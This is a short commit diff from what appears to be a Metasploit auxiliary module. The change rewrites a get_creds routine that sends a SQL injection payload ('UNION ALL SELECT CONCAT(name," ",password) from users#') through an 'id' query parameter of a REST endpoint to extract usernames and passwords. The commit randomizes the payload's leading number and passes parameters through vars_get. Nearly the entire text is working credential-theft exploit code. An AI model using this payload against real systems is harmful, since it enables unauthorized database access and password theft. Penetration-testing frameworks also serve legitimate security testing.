randomize number, use vars_get

GSoC/Meterpreter_Web_Console
Shelby Pace 2018-09-18 15:03:32 -05:00
parent d83e108e74
commit e9faf305b2
No known key found for this signature in database
GPG Key ID: B2F3A8B476406857
1 changed files with 7 additions and 4 deletions


@ -42,14 +42,17 @@ class MetasploitModule < Msf::Auxiliary
end end
def get_creds def get_creds
api_uri = "/webservice/rest/object-inquire?apikey=#{datastore['APIKEY']}&id=" api_uri = "/webservice/rest/object-inquire"
api_uri = normalize_uri(target_uri.path, api_uri) api_uri = normalize_uri(target_uri.path, api_uri)
cmd = '1) UNION ALL SELECT CONCAT(name," ",password) from users#' cmd = "#{rand(256)}) UNION ALL SELECT CONCAT(name,\" \",password) from users#"
cmd = Rex::Text.uri_encode(cmd, 'hex-all')
res = send_request_cgi( res = send_request_cgi(
'method' => 'GET', 'method' => 'GET',
'uri' => api_uri << cmd 'uri' => api_uri,
'vars_get' => {
'apikey' => datastore['APIKEY'],
'id' => cmd
}
) )
unless res unless res